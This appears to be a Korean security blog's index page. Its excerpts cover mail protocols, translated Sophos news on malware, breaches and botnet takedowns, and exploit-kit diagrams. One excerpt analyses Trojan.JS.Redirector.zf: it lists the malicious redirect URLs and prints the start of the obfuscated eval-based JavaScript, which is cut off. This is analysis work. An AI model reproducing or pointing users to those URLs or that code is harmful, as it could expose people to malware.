본문 바로가기

security

메일 서버 원리 / 스팸 메일의 차단 최근 공부하는것 중 메일서버에 대한 이야기를 들어서 이렇게 도식화를 그려본다. 사용자가 보낼때는 SMTP 포로토콜를 이용하여 전송을 하며 메일서버를 거치면서 상대방에게 가기까지는 모두 SMTP 프로토콜을 이용한다. 하지만, 받는 사람은 메일 서버에 도착되어 있는 메일을 클라이언트로 가져올 때 적용되는 프로토콜 사용하는 POP3/IMAP 프로토콜를 이용하여 확인을 하게 된다. SMTP (Simple Mail Transfer Protocol) : 클라이언트가 메일을 보내거나, 메일 서버끼리 메일을 주고 받을 때 적용되는 프로토콜 이며 사용하는 TCP 포트번호는 25번이다. POP3(Post Office Protocol) : 메일 서버에 도착되어 있는 메일을 클라이언트로 가져올 때 적용되는 프로토콜윈도 라이브.. 더보기
[Sophos] 제로액세스(ZeroAccess) 맬웨어 재논의 - 새 버전은 더욱 더 빗나감 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=22700 소포스랩에서 우리는 이전에 제로액세스(ZeroAccess) 맬웨어 계열의 위협에 대해, 그 본성을 탐구하고 이런 맬웨어 계열이 오랜 시간 지나면서 변화하는 것에 대해 문서화를 하면서 매우 심도 깊게 다루었습니다.무슨 생각이 드나요?맬웨어 제작자들은 또 다른 업데이트를 쏟아내고 있고 이번에는 확실히 재부팅을 지속하기 위해 재미있는 기술들을 사용하고 있습니다.→ Persistence 는 APT(지능형 지속 공격- Advanced Persistent Threat)의 “P”를 말합니다. 여러분이 로그오프하고 다시 로그온 할 때나 재부팅할 때 만약 맬웨어가 자동으로 직접 다시 로.. 더보기
[Sophos] 더티 더즌(Dirty Dozen) 스팸 발송국, 소포스랩 SPAMMIERSHIP League Tables 소개 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=22600 매 분기마다, 우리는 전 분기 대비 국가별 스팸트랩(spamtrap) 통계를 합하여 더티 더즌(Dirty Dozen)을 산출합니다.물론, 이것은 하나의 “경쟁”으로 스팸 제공자의 프리미어 디비전(Premier Division)으로 승격되는 것으로 환희가 아닌 실망을 안겨줍니다.승격/강등(promotion/relegation) 분석은 특히 지금이 적기입니다.이번 분기에 3개 국가가 더티 더즌(Dirty Dozen)을 벗어났지만, 표에서 13-24 위 사이에 위치하는 스팸의 세리아 B(2부)보다 훨씬 낮게 떨어진 것은 아닙니다.마찬가지로, 상위에 자리 잡았던 그 3개 국가는.. 더보기
[Sophos] “지금 바로 비밀번호를 바꾸세요”라고 권고하는 유비소프트(Ubisoft) http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=22400 유럽과 미국의 3대 게임회사인 유비소프트(Ubisoft)가 사용자명과 이메일주소, 암호화된 비밀번호가 유출되는 사고로 고객에게 비밀번호를 바꾸어 줄 것을 강력히 권고하고 있습니다.유비소프트는 지난 화요일의 보안유출에 대해 사용자에게 이메일을 보내고 블로그 포스팅을 하였습니다.유비소프트는 정보를 거의 주지 않았지만 그들은 익스플로잇 되었던 사이트를 최근에 발견했고 그 침입자들이 몇몇 온라인 시스템에 접근을 했었다고 말했습니다.유비소프트는 공격 당한 영역을 고립시키는 “긴급” 조치를 취했고 당국과 대내외 보안 전문가와 함께 조사단을 출범시켰습니다.조사가 진행되는 동안, 유비.. 더보기
[Sophos] 페이스북이 말하는 것 보다 훨씬 더 많이 유출된 페이스북 유출사건 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=22300 지난주, 네이키드 시큐리티 등에서 여러분에게 페이스북이 6백만 사용자의 이메일 주소와 전화번호를 유출했지만, 그것은 수백만 사용자 서비스에 제공된 그다지 심각하지 않은 유출이었다고 한 것을 기억하십니까?좋습니다. “심각하지 않다(modest)”라는 부분에 밑줄 그어 주세요페이스북이 사실상 사용자들에 대한 비밀 문서들을 만들고 있다는 것을 처음으로 발견했던 연구원들이 지금 그 숫자가 일치하지 않는다고 말하고 있습니다.페이스북이 그들의 시큐리티 블로그의 한 포스팅에서 언급했던 피해를 입은 사용자의 숫자는 연구원들이 발견했던 것보다 훨씬 적고, 또 페이스북은 유출시에 공유되고.. 더보기
Trojan.JS.Redirector.zf [Kaspersky] 발견지 : http://gotosite.home.xs4all.nl/b&b/left.htmx (Trojan.JS.Redirector.zf - Kaspersky) -> http://deviced.com/vanilla/8BztG4W3.phx 바이러스 토탈 : https://www.virustotal.com/en/file/160b039d3ffc826fd73313780d61fb6f7e23d92da96dc40608e34cda2ab2c6d8/analysis/1372757516/ 우연히 돌아다니다가 발견해서 끄적끄적 해본다.....최종 접속 시 왜 ok 라는 시그널만 내보낼까 궁금하다................ 쿠키값때문인가??아시는 분 계시면 알려주세요~ : ) e=eval;v="0"+"x";a=0;z="y";tr.. 더보기
[Sophos] "Citadel" 크라임웨어의 대규모 무력화(takedown) 속의 FBI와 마이크로소프트 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=22100 마이크로소프트는 수많은 민간단체와 미국 FBI 사이의 협공 덕분으로, 1462개의 시타델(Citadel) 봇넷(botnet)을 성공적으로 붕괴시켰다고 발표하였습니다.정확하게 1462개 봇넷입니다.→ 봇넷(botnet)은 봇(bots)이나 좀비(zombies)로 알려진 맬웨어에 감염된 컴퓨터들의 집합입니다. 봇넷안의 좀비들은 봇트마스터로 알려진 사이버범죄자들에 의해 나쁜 짓, 즉 스팸메일을 보내거나, 패스워드를 훔치기 위해 입력되는 모든 것을 로그로 남기거나 다른 사람들의 웹사이트를 공격하도록 원격으로 동시에 명령을 받을 수 있습니다.1462개 컴퓨터의 봇넷이 아니라 14.. 더보기
[Sophos] 미국 정부에 의해 폐쇄된 디지털 환전업체 리버티 리저브(Liberty Reserve) http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=21900 이번 주, 디지털 통화 브로커 리버티 리저브(Liberty Reserve)가 미국 당국에 기소되고 폐쇄되었습니다.'미국 사법부에 의해 조사를 받았던 회사라는 것을 알고 난 후 리버티 리저브를 폐쇄한 척하며, 코스타리카에 있는 자금세탁 방지 기관이라 거짓말을 하고서는, 시프루스, 러시아, 홍콩, 중국, 모로코, 스페인, 호주 등에서 유지되고 있는 쉘컴퍼니 계정을 통해 수 억 달러가 움직였습니다.”더군다나 리버티 리저브 설립자인 아서 부도브스키(Arthur Budovsky)와 그 관계자 중 적어도 한 명이 스페인에서 체포되었습니다. 나머지 다섯 명도 기소되었습니다.대부분의 .. 더보기
[Sophos] 티파니에서의 아침 맬웨어? 널리 퍼진 트로이목마 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=21800 여러분의 받은 편지함을 열어 봤을 때, 다음과 같은 이메일을 본 적이 있나요?수출 라이선스 및 대금 청구서를 열어서 보시기 바라며, 한편으로 우리는 어제 잔금청구를 하였습니다. 여러분의 대금을 결제했는지 확인해 주시고 문제가 있으면 연락 주시기 바랍니다.감사합니다. Karen parker당신이 무엇을 하든지, 이메일에 첨부된 파일을 열어서는 안됩니다.invoice copy.zip 파일에 포함된 건 당신 컴퓨터를 감염시키기 위해 제작된 악성 트로이목마 바이러스입니다.소포스는 그 맬웨어를 Mal/BredoZp-B로 미리 감지하지만, 다른 회사 제품을 사용하는 사용자들은 그들.. 더보기
Red Exploit Kit (CVE-2013-0422) 에서 변경된 Cool Exploit Kit(CVE-2013-2423) 도식화 한동안 잠잠했던 Red Exploit Kit 이 Cool Exploit Kit 으로 변경되어서 출현 하였다.우연히 발견하여서 도식화를 시켜놓는다. 국내에는 별로 영향력이 없지만 해외에서는 그래도 종종 나오나 보다. 검색을 하면 국내보다는 해외 블로그가 더 많이 보인다. 최근에 본 Sakura Exploit kit 에 이어서 Cool Exploit Kit 까지 국내에는 95% 공다팩이라면 해외에서는 Blackhole Exploit Kit ,Cool Exploit kit, Sakura Exploit kit 까지 많은 킷들이 활동을 하고 있다. Cool Exploit kit 자세한 정보 : http://malware.dontneedcoffee.com/2013/04/cve-2013-2423-integrating.. 더보기